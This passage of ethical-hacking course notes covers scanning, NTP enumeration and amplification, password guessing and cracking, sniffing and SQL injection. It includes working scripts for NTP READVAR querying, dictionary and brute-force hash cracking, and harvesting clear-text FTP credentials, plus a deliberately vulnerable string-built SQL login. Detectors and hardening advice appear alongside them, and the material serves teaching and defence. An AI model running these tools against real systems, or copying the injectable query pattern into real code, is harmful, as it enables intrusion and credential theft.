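    """The ports a report lists first: those with a listener behind them."""
    return sorted(p for p, state in results.items() if state == OPEN)


if __name__ == "__main__":
    # Demo against the loopback interface: a throwaway listener provides one
    # open port; the kernel answers RST for the others, so they show as closed.
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    demo_port = listener.getsockname()[1]
    results = scan("127.0.0.1", [22, 80, 443, demo_port, 8080], timeout=0.5)
    for port, state in sorted(results.items()):
        print(f"{port:5d}/tcp {state}")
    print("open:", open_ports(results))
    listener.close()
```

Because every probe completes the handshake, the target's application sees and may log
each connection; a SYN (stealth) scan avoids that but requires raw sockets. A "filtered"
result is only a timeout, so raise the timeout before concluding that a firewall is in
the path on a slow link.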

Tools Used in Port Scanning:

 Nmap
 Angry IP Scan
 Netcat
 Zenmap
 Advanced Port Scanner
 MASSCAN

ping sweep
A ping sweep (also known as an ICMP sweep) is a basic network scanning technique used to
determine which of a range of IP addresses map to live hosts (computers).

Whereas a single ping will tell whether one specified host exists on the network, a ping
sweep consists of ICMP (Internet Control Message Protocol) echo requests sent to every
address in a range. Each echo request needs an address to send to, which can be an IP
address or a host name that is resolved first.

If a given address is live, it returns an ICMP echo reply. To hinder ping sweeps,
administrators can block ICMP echo requests from outside sources. However, ICMP timestamp
and address mask requests can be used in a similar manner, and scanners such as Nmap fall
back to TCP probes (a SYN to port 443 or an ACK to port 80) and, on the local segment, to
ARP requests, so blocking ICMP alone does not hide a host.

NTP Enumeration
NTP enumeration is the process by which an attacker discovers NTP servers on the network
and queries them for information. A server left at its defaults answers control queries
(the readvar and monlist requests that ntpq and ntpdc send) that reveal its software
version, operating system, stratum, peers and even the addresses of its recent clients.
This information can then be used to find vulnerable NTP servers, or simply to further
enumerate the network. Servers that are reachable from the internet have a much higher
chance of being abused. An attacker will often use both DNS and brute-force methods to find
these servers, as well as search engines such as [Link] or Censys to find exposed devices.
Exploit Vulnerability:
Although NTP servers are typically given special access through the network perimeter,
they do not always have to be on the same network as the hosts they serve. For example,
an attacker who finds a server with UDP port 123 open can ask it, via monlist, for the
list of hosts that recently talked to it, and thereby obtain a list of internal hosts
without scanning them directly. The attacker can then feed that list to scanners that
look for vulnerable hosts. Compared with other types of vulnerability this takes more
research and offers fewer direct exploitation options: the information leak is used to
map the network rather than to gain code execution. The second way to abuse the same
query is amplification: a monlist reply is many times larger than the request, so an
attacker sends requests with a spoofed source address and the server floods the victim.

Properties:
 Since NTP can be used to enumerate many hosts on a network, some basic checks
should be done against a server before relying on it as an enumeration route.
 "ntpq -c readvar <host>" and "ntpdc -c monlist <host>" are easy checks that can be
run against a single server: one that answers the first leaks its version and operating
system, and one that answers the second leaks the list of recent clients and peers.
 A ping sweep is another easy test that reveals which hosts are live, simply by sending
packets from the attacker's machine and recording which addresses reply.
 These tests can be automated: Nmap's ntp-info and ntp-monlist scripts run both queries
("nmap -sU -p 123 --script ntp-info,ntp-monlist <host>"), and tcpdump can confirm on the
wire what the server answers. Nessus and OpenVAS also ship checks for NTP configurations.
 Nessus is a network security scanner available for most operating systems. It runs
checks against a range of services; NTP is among them and each weakness is identified by
a plugin. Scans should be scheduled, since some checks can disturb fragile services.
 OpenVAS is an open-source vulnerability scanner that can scan networks for common
known vulnerabilities, including exposed NTP control queries, and several front-ends are
available that automate scanning with it.
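What the readvar check actually sends and what comes back is worth seeing on the wire.
The script below, added here as an example (it is not from the original notes or from
ntpd/Nmap), builds the same 12-byte mode 6 READVAR control request that "ntpq -c readvar"
and Nmap's ntp-info script use, and parses the key=value list a talkative server returns.
The wire layout follows the NTP control-message format (RFC 9327); the sample response
bytes are constructed, not captured from a real server, and the query() helper that talks
to a real host over UDP/123 is not exercised offline.

```python
"""NTP mode 6 READVAR enumeration (what "ntpq -c readvar" and Nmap's ntp-info do).

Added example for these notes; it is not code from the original text or from
ntpd. The wire layout follows the NTP control-message format (RFC 9327); the
sample response below is constructed, not captured from a real server.
"""
import socket
import struct

NTP_PORT = 123
MODE_CONTROL = 6
OP_READVAR = 2


def build_readvar(sequence=1, association_id=0):
    """12-byte control request: LI=0, VN=2, mode 6, opcode READVAR, count 0.

    Association ID 0 asks for the system variables (version, OS, stratum,
    reference ID ...), which is exactly the leak enumeration is after.
    """
    first = (0 << 6) | (2 << 3) | MODE_CONTROL   # 0x16
    second = OP_READVAR                          # R=E=M=0, opcode 2 -> 0x02
    return struct.pack("!BBHHHHH", first, second, sequence, 0, association_id, 0, 0)


def parse_control(packet):
    """Split a control packet into its header fields and data payload."""
    if len(packet) < 12:
        raise ValueError("short control packet")
    first, second, seq, status, assoc, offset, count = struct.unpack("!BBHHHHH", packet[:12])
    if first & 0x07 != MODE_CONTROL:
        raise ValueError("not a mode 6 packet")
    return {
        "response": bool(second & 0x80),   # R bit: this is a reply
        "error": bool(second & 0x40),      # E bit: server reports an error
        "more": bool(second & 0x20),       # M bit: further fragments follow
        "opcode": second & 0x1F,
        "sequence": seq, "status": status, "association": assoc, "offset": offset,
        "data": packet[12:12 + count],
    }


def parse_variables(data):
    """Turn 'k=v, k="v, with comma"' into a dict, honouring quotes."""
    out, field, quoted = {}, [], False
    for ch in data.decode("ascii", "replace"):
        if ch == '"':
            quoted = not quoted
        elif ch == "," and not quoted:
            _add(out, "".join(field))
            field = []
        else:
            field.append(ch)
    _add(out, "".join(field))
    return out


def _add(out, item):
    item = item.strip()
    if "=" in item:
        k, v = item.split("=", 1)
        out[k.strip()] = v.strip()
    elif item:
        out[item] = ""


def query(host, timeout=2.0):
    """Send READVAR over UDP and reassemble fragments; returns the variable dict."""
    data, seq = b"", 1
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_readvar(seq), (host, NTP_PORT))
        while True:
            hdr = parse_control(s.recv(1024))
            if hdr["sequence"] != seq or not hdr["response"]:
                continue
            data += hdr["data"]
            if not hdr["more"]:
                break
    return parse_variables(data)


# Constructed response, as a server whose "restrict default" line lacks
# noquery would answer: R bit set, opcode 2, count = len(body).
SAMPLE_BODY = (b'version="ntpd 4.2.8p15@1.3728-o Fri Jun 12 01:15:00 UTC 2020 (1)", '
               b'processor="x86_64", system="Linux/5.4.0-generic", leap=00, stratum=2, '
               b'precision=-23, rootdelay=0.889, refid=203.0.113.10, tc=6, peer=37681\r\n')
SAMPLE_RESPONSE = struct.pack("!BBHHHHH", 0x16, 0x80 | OP_READVAR, 1, 0, 0, 0,
                              len(SAMPLE_BODY)) + SAMPLE_BODY


def enumerate_sample():
    """Parse the constructed response and return the fields a pentester reports."""
    hdr = parse_control(SAMPLE_RESPONSE)
    v = parse_variables(hdr["data"])
    return {k: v.get(k) for k in ("version", "system", "processor", "stratum", "refid")}


if __name__ == "__main__":
    print(build_readvar().hex())
    for k, val in enumerate_sample().items():
        print(f"{k:10s} {val}")
```

A server hardened with the noquery restriction answers this request with nothing at all
(or a rate-limited "kiss-of-death"), which is the result the checks above should produce
on a properly configured host.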
NTP Security Model:
 NTP runs over UDP port 123. Besides unicast client/server mode it has symmetric
(peer), broadcast and multicast modes; there is no TCP transport.
 NTP does not encrypt time data. Its protection is authentication: a message
authentication code (keyed MD5 or SHA-1 in RFC 5905) computed with a symmetric key
shared between a server and its clients, so a tampered or forged packet fails
verification.
 There are two authentication schemes, symmetric keys and Autokey. Autokey (RFC 5906)
is a public-key scheme intended for broadcast and multicast; it has known weaknesses and
is deprecated, so in practice servers use symmetric keys, and Network Time Security (NTS,
RFC 8915) is the modern replacement.
 Time sources form a hierarchy of strata: a "stratum 1" server is attached to a
reference clock, a stratum 2 server synchronizes to a stratum 1 server, and so on.
 Time packets and control packets (mode 6, and the legacy mode 7 used by monlist) share
the same UDP port. The control packets are what enumeration and amplification abuse, and
they are not authenticated by default.
 A client is identified by its source IP address (not its MAC address); because UDP
lets that address be spoofed, an unrestricted server can be turned into a reflector.
 Firewalls need to be configured to allow NTP (UDP 123) only to and from the designated
time servers.
 NTP can operate in non-authenticated or authenticated mode.
Important Points:
 In practice, not the whole network needs to be hardened as NTP servers; only the first
level of infrastructure (the servers that clients synchronize to), while ordinary clients
should be configured not to answer queries at all.
 Restrict control queries on every server (the noquery restriction in ntp.conf, or a
build without mode 7 support) so that readvar and monlist do not answer unauthenticated
sources.
 Network time can be disabled on wrongly configured devices, or overridden in clients
and servers.
 Servers should use several independent time sources, and clients should be pinned to
the organization's own servers (otherwise a client can be steered to a false time by an
attacker).
Conclusion:
NTP is an old protocol that, at its defaults, reveals more information about the network
than most other protocols. There are known vulnerabilities in NTP servers, and even where
they are not serious it is always better to make sure a server is patched and its control
queries restricted before connecting it to the network. Security expert Bruce Schneier
says this about NTP: "NTP has been used for years as a legitimate way to share clock
timing between devices so that they know what time it is and can be synchronized.
However, serious vulnerabilities have always been there and remain today. Since they're
easy to exploit, NTP should be kept off the corporate network."

Linux/Unix Tutorial
This Linux tutorial provides basic and advanced concepts of Linux and is designed for
beginners and professionals.

Linux is an open-source operating system, like Windows, macOS, Android, etc.

Unix is also an operating system like Linux; it is a commercial OS. It consists of three
parts: the kernel, the shell and the programs. Most Unix and Linux commands are similar in
nature.

The tutorial covers Linux commands, directories, files, man pages, file contents, file
permissions, shells, the vi editor etc. Linux interview questions are also given to help
you better understand the Linux operating system.

UNIT III
SYSTEM HACKING

Aspect of Remote password guessing:

Password guessing is the process of attempting to gain access to a system through the
systematic guessing of passwords (and at times also usernames) in an attempt to obtain a login
to a target system. This is problematic in that, when conducted remotely, it generally creates
voluminous amounts of both network traffic and system log entries.

This is in effect a brute-force or dictionary-style attempt to find the proverbial needle in
the haystack. The attacker, or the auditor as the case may be, will succeed only in the event
that strong passwords are not used. This is one of the reasons that password complexity controls
and checks have been built into most modern operating systems. Many applications, including
those deployed on the Internet, do not use these types of controls. This is where tools such as
Brutus come into play.

The issue with this type of test is that it can result in account lockout. This is either an
accidental or an intentional DoS (denial of service) possibility when a username is tested many
thousands of times in a single minute. Even with "speed bump" account locking (a temporary
lock after a few failures), the username will be tested so many times that it locks. An attacker
who can tell valid from invalid usernames by a difference in the login responses could do this
out of spite without ever gaining access to the system. Password spraying, a few common
passwords tried against many usernames, is the attacker's way of staying under such lockouts.

Password guessing is slow in comparison to cracking, and it is unlikely that an attacker will
ever guess a "good" complex password with this method while the speed bump lockout is in place.
The attempt also creates large amounts of unusual network traffic. Not only can this impact
network performance, but it should stand out against a standard network traffic baseline. This
is another reason why the creation of network baselines is important.
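The log volume that remote guessing produces is also what gives it away. The script
below, added here as an example and not part of the original notes, runs simple detection
logic over sshd log lines: it counts failed logins per source address in a sliding window,
labels a burst against one account as brute force and a burst spread across many accounts
as password spraying (the pattern that stays under per-account lockout), and flags a
successful login from a source that was guessing. The log lines are constructed in
standard syslog/sshd format, and the window and threshold are assumptions that a real
deployment would tune against its own baseline.

```python
"""Detect remote password guessing in sshd log lines.

Added example for these notes (not from the original text). The log lines
below are constructed in syslog/sshd format; the window and threshold are
assumptions a real deployment would tune against its own baseline.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)
WINDOW_SECONDS = 60    # assumption: one-minute sliding window
FAIL_THRESHOLD = 5     # assumption: 5 failures per source per window


def parse_line(line):
    """Return {ts, ok, user, ip} for password-auth lines, None for anything else."""
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
    return {"ts": ts, "ok": m["result"] == "Accepted", "user": m["user"], "ip": m["ip"]}


def detect(lines):
    """Return a list of (ip, kind, detail) findings.

    brute_force            : many failures against one or two accounts from one source
    password_spray         : many failures spread across many accounts from one source
    success_after_failures : a login accepted from a source that was guessing
    """
    recent = defaultdict(deque)   # ip -> deque of (ts, user) failures inside the window
    flagged, findings = set(), []
    for ev in filter(None, map(parse_line, lines)):
        q = recent[ev["ip"]]
        while q and (ev["ts"] - q[0][0]).total_seconds() > WINDOW_SECONDS:
            q.popleft()
        if ev["ok"]:
            if q:
                findings.append((ev["ip"], "success_after_failures",
                                 f"user={ev['user']} after {len(q)} failures"))
            continue
        q.append((ev["ts"], ev["user"]))
        if len(q) >= FAIL_THRESHOLD and ev["ip"] not in flagged:
            users = {u for _, u in q}
            kind = "password_spray" if len(users) > 2 else "brute_force"
            findings.append((ev["ip"], kind, f"{len(q)} failures, {len(users)} accounts"))
            flagged.add(ev["ip"])
    return findings


# Constructed sample log: one source hammering root, one spraying many accounts,
# then root logging in from the hammering source. The publickey line is ignored.
SAMPLE_LOG = """\
Mar  3 10:01:02 bastion sshd[2210]: Failed password for root from 198.51.100.7 port 51022 ssh2
Mar  3 10:01:03 bastion sshd[2211]: Failed password for root from 198.51.100.7 port 51023 ssh2
Mar  3 10:01:04 bastion sshd[2212]: Failed password for root from 198.51.100.7 port 51024 ssh2
Mar  3 10:01:05 bastion sshd[2213]: Failed password for root from 198.51.100.7 port 51025 ssh2
Mar  3 10:01:06 bastion sshd[2214]: Failed password for root from 198.51.100.7 port 51026 ssh2
Mar  3 10:01:07 bastion sshd[2215]: Failed password for root from 198.51.100.7 port 51027 ssh2
Mar  3 10:01:20 bastion sshd[2216]: Failed password for invalid user admin from 203.0.113.44 port 40001 ssh2
Mar  3 10:01:21 bastion sshd[2217]: Failed password for alice from 203.0.113.44 port 40002 ssh2
Mar  3 10:01:22 bastion sshd[2218]: Failed password for bob from 203.0.113.44 port 40003 ssh2
Mar  3 10:01:23 bastion sshd[2219]: Failed password for invalid user test from 203.0.113.44 port 40004 ssh2
Mar  3 10:01:24 bastion sshd[2220]: Failed password for carol from 203.0.113.44 port 40005 ssh2
Mar  3 10:01:30 bastion sshd[2221]: Accepted password for root from 198.51.100.7 port 51028 ssh2
Mar  3 10:05:00 bastion sshd[2222]: Accepted publickey for alice from 192.0.2.5 port 40010 ssh2
"""


def analyze_sample():
    return detect(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for ip, kind, detail in analyze_sample():
        print(f"{ip:15s} {kind:24s} {detail}")
```

The "success_after_failures" finding is the one worth paging on: a guessing source that
eventually gets in is a compromise, not noise, whereas the two burst findings are
candidates for blocking at the firewall.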
Roles of Eavesdropping:
 Pickup devices pick up sounds or images, from the attached microphones and
video cameras, and then the attackers can convert them into an electrical format
to eavesdrop on targets. Attackers may also use mini amplifiers that help them in
minimizing the background noise.

 A transmission link between a sender and the receiver would be tapped to
eavesdrop. This can be done with the radio-frequency transmission or a wire,
which can include active or unused telephone lines, electrical wires, or
ungrounded electrical conduits. Some transmitters can operate continuously, but
another approach can be remote activation.
 A listening post is when we put bugs on telephones to hear the conversations
taking place. It uses triggers that records when a telephone is picked up to make
or take a call and it is automatically turned off when the call ends. Secure areas
where these recordings are monitored are known as listening posts. It can be
anywhere, and they have voice-activated equipment available to eavesdrop and
record every activity.

 It is easier for attackers to gain unauthorized access to user accounts when weak
passwords are used. It gives them a way to intrude into corporate systems and
networks. Cyber attackers use these to their advantage and access confidential
communication channels, intercepting activity, to listen in on conversations
between colleagues to steal confidential business data.

 Users who connect to open networks that do not require any password and do
not use encryption for the transmission of data provide an ideal situation for
attackers for eavesdropping. Attackers can easily monitor user activity and listen
to the communications that take place on the network.

Various methods of password cracking:

There are a number of methods that can be used to crack passwords. We describe the most
commonly used ones below:

 Dictionary attack– This method uses a wordlist: each word is hashed and compared
against the stored password hashes.
 Brute force attack– This method tries every combination of characters from a chosen
set (letters, digits and symbols) up to a given length. It is exhaustive, so its cost
grows exponentially with the password length. A variant such as "p@$$word" for
"password" is in practice produced by a mangling rule applied to a dictionary word,
a hybrid of the two methods rather than pure brute force.
 Rainbow table attack– This method uses pre-computed hashes. Let's assume that we
have a database which stores passwords as unsalted MD5 hashes. We can build another
database of MD5 hashes of commonly used passwords (rainbow tables store these as chains
to save space) and compare each stolen hash against it. If a match is found, we have the
password. A per-user random salt defeats this, because the table would have to be
recomputed for every salt.
 Guess– As the name suggests, this method involves guessing. Passwords such as
qwerty, password, admin, etc. are commonly used or set as default passwords. If
they have not been changed, or if the user is careless when selecting passwords,
they can be easily compromised.
 Spidering– Many organizations use passwords that contain company information. This
information can be found on company websites and social media such as Facebook,
Twitter, etc. Spidering gathers information from these sources to build word lists,
which are then used to perform dictionary and hybrid attacks.
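The methods above are easiest to compare side by side against the same hash dump. The
script below is an added example, not code from the original notes or from any cracking
tool: it runs a dictionary attack with mangling rules (which is where "p@$$word" really
comes from), builds a precomputed hash lookup table, falls back to exhaustive brute force
for a short password, and finally shows why a per-user salt with a slow hash defeats the
table. The hashes, the wordlist and the rules are constructed; real attacks use wordlists
of millions of entries and tools such as hashcat or John the Ripper.

```python
"""Offline password cracking: dictionary + rules, lookup table, brute force, salts.

Added example for these notes, not code from the original text. The hashes,
wordlist and mangling rules are constructed.
"""
import hashlib
import itertools
import os

LEET = str.maketrans({"a": "@", "s": "$", "i": "1", "e": "3"})


def mangle(word):
    """Rule-based variants of one dictionary word (case changes, leetspeak,
    common suffixes). 'password' -> 'p@$$word' is one of these rules."""
    base = {word, word.lower(), word.capitalize(), word.upper(), word.translate(LEET)}
    for w in sorted(base):
        for suffix in ("", "1", "123", "!", "2024"):
            yield w + suffix


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def dictionary_attack(target_hashes, wordlist):
    """Hash every candidate and compare against the set of unsalted MD5 hashes."""
    cracked, wanted = {}, set(target_hashes)
    for word in wordlist:
        for cand in mangle(word):
            h = md5_hex(cand)
            if h in wanted:
                cracked[h] = cand
                wanted.discard(h)
    return cracked


def build_lookup_table(wordlist):
    """Precomputed hash -> plaintext table: the idea behind rainbow tables,
    minus the chain compression. Built once, reused against every dump."""
    return {md5_hex(c): c for w in wordlist for c in mangle(w)}


def brute_force(target_hash, alphabet="abcdefghijklmnopqrstuvwxyz0123456789", max_len=4):
    """Exhaustive search over short passwords; cost grows as |alphabet| ** length."""
    for n in range(1, max_len + 1):
        for tup in itertools.product(alphabet, repeat=n):
            cand = "".join(tup)
            if md5_hex(cand) == target_hash:
                return cand
    return None


def salted_hash(password, salt=None):
    """Per-user random salt plus a slow KDF: the same password hashes differently
    for every user, so one precomputed table cannot serve all of them."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def salt_defeats_table():
    """True when two users with the same password get different stored hashes."""
    _, h1 = salted_hash("p@$$word")
    _, h2 = salted_hash("p@$$word")
    return h1 != h2


# Constructed "dump" of unsalted MD5 hashes and a tiny wordlist. "acme" stands for a
# company name picked up by spidering the organization's website.
TARGETS = [md5_hex("p@$$word"), md5_hex("Summer2024"), md5_hex("acme123"), md5_hex("x7k")]
WORDLIST = ["password", "summer", "acme", "welcome"]


def run_demo():
    cracked = dictionary_attack(TARGETS, WORDLIST)
    table = build_lookup_table(WORDLIST)
    from_table = {h: table[h] for h in TARGETS if h in table}
    leftover = [h for h in TARGETS if h not in cracked]
    forced = brute_force(leftover[0]) if leftover else None
    return {"dictionary": cracked, "table": from_table, "brute": forced}


if __name__ == "__main__":
    for method, result in run_demo().items():
        print(method, "->", result)
    print("salt defeats table:", salt_defeats_table())
```

Three of the four hashes fall to a four-word list with rules; only the short random
password needs exhaustive search, and making the alphabet or the length larger is what
pushes that search out of reach.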

Keystroke loggers:
A keystroke logger, also known as a keylogger, is a software program or hardware device that logs
and records every keystroke input on a computer. Bad actors can use it to steal sensitive data like
passwords, financial information, and other confidential information. Keyloggers can also be used
legitimately by parents to monitor their kids' online activities, and employers can use them to track
employees' computer usage.

Keyloggers can be broken down into two distinct definitions:

 Keystroke logging: The process of recording and storing every key that’s pressed on
a keyboard.
 Keylogger tools: Devices or programs designed to log a user’s keystrokes.
In addition to recording keystrokes, keylogger software can also collect user data through other
methods, such as capturing screenshots, recording web searches and visits, and monitoring clipboard
activity.

2 types of keyloggers
Keyloggers are either hardware-based or software-based.

Hardware-based keyloggers
Hardware keyloggers are physical devices used to monitor and record a user's activity on a computer.
These devices are plugged in between the keyboard and the computer (or built into a keyboard) and
have their own internal memory. The data is recorded directly to the device's memory and can be
retrieved later by the attacker.

Hardware keyloggers are more difficult to detect than software keyloggers, because they are invisible
to the operating system and to antivirus software. To prevent hardware keyloggers from being
installed, physically inspect your computer's ports and cables periodically for any suspicious
devices that may have been installed without your knowledge.

Software-based keyloggers
A software keylogger is a type of monitoring and tracking software that logs keystrokes from a
computer keyboard. The keystrokes are recorded and stored in a log file, often encrypted, that the
attacker retrieves remotely or that the keylogger sends out over the network.
Software keyloggers are disseminated when you click on malicious links, download malware, visit
a website with dangerous code, or open files that have been infected with malware. Although more
easily detectable than hardware keyloggers, software-based keyloggers can be installed remotely,
without needing physical access to your system.

Understanding Sniffers:
Sniffers are programs or tools designed to intercept (capture) and analyze data
packets (information) transmitted between devices or computers on wired and wireless
networks. Essentially, these tools capture data packets, which are then decoded and
presented in a format that users can understand. This enables users to inspect the contents
of these packets and extract valuable information, such as credentials or card details sent
over unencrypted protocols. Wireshark (formerly called Ethereal), NetworkMiner, tcpdump,
and the capture engine behind the Snort intrusion detection system are well-known examples.

Sniffers are known by various names, such as network probes, wireless sniffers, packet
sniffers, ethernet sniffers, and packet analyzers, and are crucial in network management and
security. They can capture data across network protocols like FTP, TCP/IP, HTTP, and SMTP.
This versatility makes them invaluable for identifying network issues like packet loss,
congestion, and incorrect configurations.
However, the use of sniffers also brings up significant privacy and ethical concerns. They are
particularly problematic when used by malicious actors for data breach (theft) and network
intrusions.
Comprehending Active and passive Sniffing:

Active sniffing

• In this sniffing type, the attacker directly interacts with the target network by
sending packets and receiving responses.
• This sniffing is carried out on a switched network. A switch forwards each frame only
to the port of its destination MAC address, so the attacker must first manipulate the
network: either by ARP poisoning (sending forged ARP replies so that hosts send their
traffic to the attacker's MAC address) or by MAC flooding (overflowing the switch's
address table with bogus MAC addresses so that it falls back to forwarding frames to all
ports).
• Examples of active sniffing: ARP spoofing, MAC flooding, HTTPS and SSH
spoofing, DNS spoofing etc.

Passive sniffing
• In this sniffing type, the attacker does not interact with the target. He/she
simply hooks on to the network and captures packets transmitted and received
by the network or exchanged between two machines.
• This sniffing is carried out on a hub, which repeats every frame to every port, so
the attacker only needs a connection to the LAN and a network card in promiscuous mode.
• Examples of passive sniffing: hub-based networks or wireless networks, where every
station in range receives all frames.
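Whether the frames arrive through a hub, a flooded switch or a poisoned ARP cache, what
the sniffer does with them is the same: decode the headers and pull out whatever the
protocol sends in the clear. The script below is an added example, not code from the
original notes or from Wireshark/tcpdump. It parses Ethernet, ARP, IPv4 and TCP headers
from raw frames, extracts clear-text FTP credentials, and flags an ARP reply that moves an
IP address to a different MAC, which is the footprint of the ARP poisoning used for active
sniffing. The frames are constructed with the builders included (IP and TCP checksums are
left at zero), so it runs without capture privileges; on a real interface the same
parse_frame() would be fed from a raw socket or a pcap file.

```python
"""A sniffer's analysis stage: parse Ethernet/ARP/IPv4/TCP, harvest clear-text
FTP credentials, and flag ARP replies that change an IP-to-MAC mapping.

Added example for these notes; not code from the original text or from
Wireshark/tcpdump. The frames are constructed below (checksums left at zero).
"""
import re
import struct

ETH_ARP, ETH_IPV4 = 0x0806, 0x0800


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def parse_frame(frame):
    """Decode one Ethernet II frame into a dict of the fields a sniffer shows."""
    etype = struct.unpack("!H", frame[12:14])[0]
    pkt = {"eth_dst": mac_str(frame[:6]), "eth_src": mac_str(frame[6:12]), "proto": "other"}
    body = frame[14:]
    if etype == ETH_ARP:
        oper = struct.unpack("!H", body[6:8])[0]          # 1 = request, 2 = reply
        pkt.update(proto="arp", op=oper, sender_mac=mac_str(body[8:14]),
                   sender_ip=ip_str(body[14:18]), target_ip=ip_str(body[24:28]))
    elif etype == ETH_IPV4:
        ihl = (body[0] & 0x0F) * 4                         # IPv4 header length
        pkt.update(proto="ipv4", src_ip=ip_str(body[12:16]), dst_ip=ip_str(body[16:20]))
        if body[9] == 6:                                   # protocol 6 = TCP
            tcp = body[ihl:]
            sport, dport = struct.unpack("!HH", tcp[:4])
            doff = (tcp[12] >> 4) * 4                      # TCP header length
            pkt.update(proto="tcp", sport=sport, dport=dport, data=tcp[doff:])
    return pkt


class Monitor:
    """Consumes frames and records findings as (kind, detail) tuples."""

    def __init__(self):
        self.arp_table = {}     # ip -> mac seen in ARP replies
        self.findings = []

    def feed(self, frame):
        p = parse_frame(frame)
        if p["proto"] == "arp" and p["op"] == 2:           # ARP reply ("is-at")
            known = self.arp_table.get(p["sender_ip"])
            if known and known != p["sender_mac"]:
                self.findings.append(("arp_spoof",
                                      f"{p['sender_ip']} moved from {known} to {p['sender_mac']}"))
            self.arp_table[p["sender_ip"]] = p["sender_mac"]
        elif p["proto"] == "tcp" and p["dport"] == 21:     # FTP control channel, clear text
            m = re.match(rb"(USER|PASS) (\S+)", p["data"])
            if m:
                self.findings.append((m[1].decode().lower(),
                                      f"{p['src_ip']} -> {p['dst_ip']}: {m[2].decode()}"))
        return p


# ---- builders for the constructed sample traffic ---------------------------
def _mac(s):
    return bytes.fromhex(s.replace(":", ""))


def _ip(s):
    return bytes(int(o) for o in s.split("."))


def arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    body = (struct.pack("!HHBBH", 1, ETH_IPV4, 6, 4, 2) + _mac(sender_mac) + _ip(sender_ip)
            + _mac(target_mac) + _ip(target_ip))
    return _mac(target_mac) + _mac(sender_mac) + struct.pack("!H", ETH_ARP) + body


def tcp_frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, data):
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + data
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     _ip(src_ip), _ip(dst_ip)) + tcp
    return _mac(dst_mac) + _mac(src_mac) + struct.pack("!H", ETH_IPV4) + ip


GATEWAY, CLIENT = "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:10"
SERVER, ATTACKER = "aa:bb:cc:00:00:20", "de:ad:be:ef:00:01"
SAMPLE_FRAMES = [
    arp_reply(GATEWAY, "192.0.2.1", CLIENT, "192.0.2.10"),     # legitimate gateway
    tcp_frame(CLIENT, SERVER, "192.0.2.10", "192.0.2.20", 40321, 21, b"USER alice\r\n"),
    tcp_frame(CLIENT, SERVER, "192.0.2.10", "192.0.2.20", 40321, 21, b"PASS hunter2\r\n"),
    arp_reply(ATTACKER, "192.0.2.1", CLIENT, "192.0.2.10"),    # attacker claims the gateway IP
]


def run_sample():
    mon = Monitor()
    for frame in SAMPLE_FRAMES:
        mon.feed(frame)
    return mon.findings


if __name__ == "__main__":
    for kind, detail in run_sample():
        print(f"{kind:10s} {detail}")
```

The same two checks, in the other direction, are the defences: encrypt the protocol so
the USER/PASS lines are not there to harvest, and watch the ARP table (or use dynamic ARP
inspection on the switch) so a moved gateway mapping raises an alarm.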

UNIT-IV

Web application vulnerabilities

involve a system flaw or weakness in a web-based application. They have been
around for years, largely due to not validating or sanitizing form inputs,
misconfigured web servers, and application design flaws, and they can be exploited
to compromise the application's security.

These vulnerabilities are not the same as other common types of vulnerabilities,
such as network or host vulnerabilities. They arise because web applications need to
interact with multiple users across multiple networks, and that level of accessibility
is easily taken advantage of by hackers.

There are web application security solutions designed specifically for applications,
and as such it is important to look beyond traditional vulnerability scanners when it
comes to identifying gaps in an organization's application security. To really
understand your risks, learn more about the common types of cybersecurity attacks and
how web scanners can help increase the safety of your applications.

SQL Injection Attacks

Structured Query Language (SQL) is now so commonly used to manage and direct
information in applications that hackers have come up with ways to slip their own
SQL commands into the database.

These commands may change, steal or delete data, and they may also give the
attacker access to the underlying server. SQL (officially pronounced ess-cue-el, but
commonly pronounced "sequel") stands for structured query language; it is a
language used to communicate with databases. Many of the servers that store critical
data for websites and services use SQL to manage the data in their databases.

An SQL injection attack specifically targets this kind of server, using malicious code
to get the server to divulge information it normally wouldn’t. This is especially
problematic if the server stores private customer information from the web site or
web application, such as credit card numbers, usernames and passwords
(credentials), or other personally identifiable information, which are tempting and
lucrative targets for an attacker.

Successful SQL injection attacks typically occur because a vulnerable application builds
its queries by concatenating user input into the SQL text, so input containing quotes and
SQL keywords changes the meaning of the query. Stripping out "anything that looks like
SQL" is not a reliable defense; the fix is to pass user input as bound parameters of a
prepared statement, so the database never interprets it as code. For example, if an
application is vulnerable to an injection attack, it may be possible for an attacker to go
to a website's search box and type in input that instructs the site's SQL server to
dump all of its stored usernames and password hashes for the site.
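The difference between concatenation and bound parameters is clearest with both login
functions side by side against the same database. The script below is an added example,
not code from the original notes or from any framework: it creates an in-memory SQLite
database with a constructed users table, shows the string-built login being bypassed with
a comment payload and the search box being abused with UNION to read password hashes,
and shows the parameterized version rejecting the same input. The table layout and the
login functions are assumptions.

```python
"""SQL injection: string-built query beside the parameterized fix.

Added example for these notes (not from the original text). Uses an in-memory
SQLite database with a constructed users table; the column names and the
login functions are assumptions.
"""
import hashlib
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    for user, pw in (("alice", "correct horse"), ("admin", "s3cret!")):
        db.execute("INSERT INTO users VALUES (?, ?)",
                   (user, hashlib.sha256(pw.encode()).hexdigest()))
    return db


def login_vulnerable(db, username, password):
    """Concatenates user input into the SQL text: a quote in the input closes
    the literal and the rest of the input becomes part of the query."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
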